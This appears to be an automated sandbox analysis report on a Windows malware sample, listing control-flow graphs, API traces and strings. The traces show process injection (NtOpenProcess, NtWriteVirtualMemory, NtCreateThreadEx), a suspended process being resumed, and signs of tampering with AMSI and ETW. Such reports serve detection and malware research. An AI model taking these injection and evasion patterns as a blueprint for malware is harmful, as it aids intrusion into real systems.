2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c546d4 * 2 call 2c689d0 call 2c67c10 call 2c68338 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 ExitProcess 4689->4780 4781 2c7952a-2c79539 call 2c548ec 4689->4781 4799 2c786f2-2c78769 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 4690->4799 4800 2c7876e-2c78879 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 4690->4800 4781->4780 4788 2c7953f-2c79812 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c6f094 call 2c54860 call 2c549a0 call 2c546d4 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c57e5c 4781->4788 5046 2c79aef-2c79cf0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c549f8 call 2c68d70 4788->5046 5047 2c79818-2c79aea call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c6e358 call 2c54530 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54de0 * 2 call 2c54764 call 2c6dc8c 4788->5047 4799->4800 4900 2c78880-2c78ba0 call 2c549f8 call 2c6de50 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c6d164 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 4800->4900 4901 2c7887b-2c7887e 4800->4901 5217 2c78ba2-2c78bb4 call 2c68730 4900->5217 5218 2c78bb9-2c7939c call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 ResumeThread call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 CloseHandle call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c68080 call 2c6894c * 6 CloseHandle call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 4900->5218 4901->4900 5046->4780 5047->5046 5217->5218 5218->4689
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DCB7E0,02DCB824,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380), ref: 02C786E9
                                                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8), ref: 02C78D33
                                                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,00000000,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380), ref: 02C78EB2
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02CD7380,02C7B7B8,UacInitialize,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,UacScan,02CD7380), ref: 02C792A4
                                                                          • Part of subcall function 02C57E5C: GetFileAttributesA.KERNEL32(00000000,?,02C7041F,ScanString,02CD7380,02C7B7B8,OpenSession,02CD7380,02C7B7B8,ScanString,02CD7380,02C7B7B8,UacScan,02CD7380,02C7B7B8,UacInitialize), ref: 02C57E67
                                                                          • Part of subcall function 02C6DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02C6DD5E), ref: 02C6DCCB
                                                                          • Part of subcall function 02C6DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C6DD05
                                                                          • Part of subcall function 02C6DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02C6DD32
                                                                          • Part of subcall function 02C6DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02C6DD3B
                                                                          • Part of subcall function 02C68338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02C683C2), ref: 02C683A4
                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,02CD7380,02C7B7B8,ScanBuffer,02CD7380,02C7B7B8,Initialize,02CD7380,02C7B7B8,00000000,00000000,00000000,ScanString,02CD7380,02C7B7B8), ref: 02C7B2FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                        • API String ID: 2769005614-3738268246
                                                                        • Opcode ID: 8ec60e1c36dd6d1959afbd12e6b9c11e62fb0636ac4bdbec5d5a5b3b69f4f06d
                                                                        • Instruction ID: ce964be06dfe80a56a76897eaef661528292bcd5b9784150278430335e1cacbd
                                                                        • Opcode Fuzzy Hash: 8ec60e1c36dd6d1959afbd12e6b9c11e62fb0636ac4bdbec5d5a5b3b69f4f06d
                                                                        • Instruction Fuzzy Hash: 0843F779A0416D8BCB24EF64DC81ADE73FAEF85304F5041E6A409AB210DA30EED5EF55
                                                                        Function 02C6B118 Relevance: 52.6, APIs: 6, Strings: 23, Instructions: 1829nativethreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 6027 2c6b118-2c6b11b 6028 2c6b120-2c6b125 6027->6028 6028->6028 6029 2c6b127-2c6b7b0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c68594 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 GetModuleHandleW call 2c68274 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 NtOpenProcess call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c52ee0 call 2c52f08 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 6028->6029 6248 2c6b7b6-2c6b930 call 2c67c10 call 2c67a2c call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 6029->6248 6249 2c6cd28-2c6cf5e call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c6894c * 3 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c6894c * 4 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 6029->6249 6248->6249 6346 2c6b936-2c6b966 call 2c658f4 IsBadReadPtr 6248->6346 6386 2c6cf63-2c6cfa0 call 2c54500 * 3 6249->6386 6346->6249 6357 2c6b96c-2c6b971 6346->6357 6357->6249 6359 2c6b977-2c6b993 IsBadReadPtr 6357->6359 6359->6249 6361 2c6b999-2c6b9a2 6359->6361 6361->6249 6363 2c6b9a8-2c6b9cd 6361->6363 6363->6249 6365 2c6b9d3-2c6bb4c call 2c67c10 call 2c67a2c call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 6363->6365 6365->6249 6430 2c6bb52-2c6bcc8 call 2c67a2c call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 6365->6430 6430->6249 6475 2c6bcce-2c6bf3e call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c6afd4 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 6430->6475 6548 2c6bf44-2c6bf45 6475->6548 6549 2c6c0dc-2c6c23a call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 6475->6549 6550 2c6bf49-2c6c0c0 call 2c6afd4 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 6548->6550 6634 2c6c266-2c6cb68 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c6afe0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c67d78 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 GetModuleHandleW call 2c68274 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 NtCreateThreadEx call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 call 2c54860 call 2c549a0 call 2c546d4 call 2c547ec call 2c549a0 call 2c546d4 call 2c689d0 6549->6634 6635 2c6c23c-2c6c261 call 2c6af24 6549->6635 6641 2c6c0c5-2c6c0d6 6550->6641 6911 2c6cb6d-2c6cd23 call 2c6894c * 5 call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c54860 call 2c549a0 call 2c547ec call 2c549a0 call 2c6894c call 2c68080 call 2c6894c * 2 6634->6911 6635->6634 6641->6549 6641->6550 6911->6249
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                        • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02CD7380,02C6CFC0,ScanString,02CD7380,02C6CFC0,ScanBuffer,02CD7380,02C6CFC0,ScanString,02CD7380,02C6CFC0,UacScan,02CD7380), ref: 02C6B3EA
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • NtOpenProcess.NTDLL(02CD7584,001F0FFF,02CD7318,02CD7330), ref: 02C6B4E8
                                                                          • Part of subcall function 02C52EE0: QueryPerformanceCounter.KERNEL32 ref: 02C52EE4
                                                                          • Part of subcall function 02C67A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
                                                                        • IsBadReadPtr.KERNEL32(0E750000,00000040), ref: 02C6B95F
                                                                        • IsBadReadPtr.KERNEL32(?,000000F8), ref: 02C6B98C
                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                        • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02CD7380,02C6CFC0,ScanString,02CD7380,02C6CFC0,04420000,04420000,0F0F0000,23828D0D,02CD7588,OpenSession,02CD7380,02C6CFC0), ref: 02C6C807
                                                                        • NtCreateThreadEx.NTDLL(02CD7560,02000000,02CD7318,04421644,04421644,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02CD7380,02C6CFC0,UacInitialize,02CD7380), ref: 02C6CA18
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryModuleProc$FreeMemoryReadVirtual$AllocateCounterCreateLoadOpenPerformanceProcessQueryThreadWrite
                                                                        • String ID: =z#$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                                                        • API String ID: 341001173-2336068375
                                                                        • Opcode ID: efd024156c4a07aa818a849199a55643cd1970532e2164127b89328ab4793061
                                                                        • Instruction ID: 5156ef719f81ff9201141c0e6e54dd94b8d597a8591f853174e71f8088ee0f52
                                                                        • Opcode Fuzzy Hash: efd024156c4a07aa818a849199a55643cd1970532e2164127b89328ab4793061
                                                                        • Instruction Fuzzy Hash: CDF2DD75B001689FDB25FF64DC89B9E73BAAF85300F1041A29445DB214DA70EEC6EF4A
                                                                        Function 02C55ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 10172 2c55acc-2c55b0d GetModuleFileNameA RegOpenKeyExA 10173 2c55b4f-2c55b92 call 2c55908 RegQueryValueExA 10172->10173 10174 2c55b0f-2c55b2b RegOpenKeyExA 10172->10174 10181 2c55b94-2c55bb0 RegQueryValueExA 10173->10181 10182 2c55bb6-2c55bd0 RegCloseKey 10173->10182 10174->10173 10175 2c55b2d-2c55b49 RegOpenKeyExA 10174->10175 10175->10173 10177 2c55bd8-2c55c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10175->10177 10179 2c55cf2-2c55cf9 10177->10179 10180 2c55c0f-2c55c13 10177->10180 10185 2c55c15-2c55c19 10180->10185 10186 2c55c1f-2c55c35 lstrlenA 10180->10186 10181->10182 10183 2c55bb2 10181->10183 10183->10182 10185->10179 10185->10186 10187 2c55c38-2c55c3b 10186->10187 10188 2c55c47-2c55c4f 10187->10188 10189 2c55c3d-2c55c45 10187->10189 10188->10179 10191 2c55c55-2c55c5a 10188->10191 10189->10188 10190 2c55c37 10189->10190 10190->10187 10192 2c55c84-2c55c86 10191->10192 10193 2c55c5c-2c55c82 lstrcpynA LoadLibraryExA 10191->10193 10192->10179 10194 2c55c88-2c55c8c 10192->10194 10193->10192 10194->10179 10195 2c55c8e-2c55cbe lstrcpynA LoadLibraryExA 10194->10195 10195->10179 10196 2c55cc0-2c55cf0 lstrcpynA LoadLibraryExA 10195->10196 10196->10179
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C50000,02C7E790), ref: 02C55AE8
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C50000,02C7E790), ref: 02C55B06
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C50000,02C7E790), ref: 02C55B24
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C55B42
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C55BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C55B8B
                                                                        • RegQueryValueExA.ADVAPI32(?,02C55D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C55BD1,?,80000001), ref: 02C55BA9
                                                                        • RegCloseKey.ADVAPI32(?,02C55BD8,00000000,?,?,00000000,02C55BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C55BCB
                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C55BE8
                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C55BF5
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C55BFB
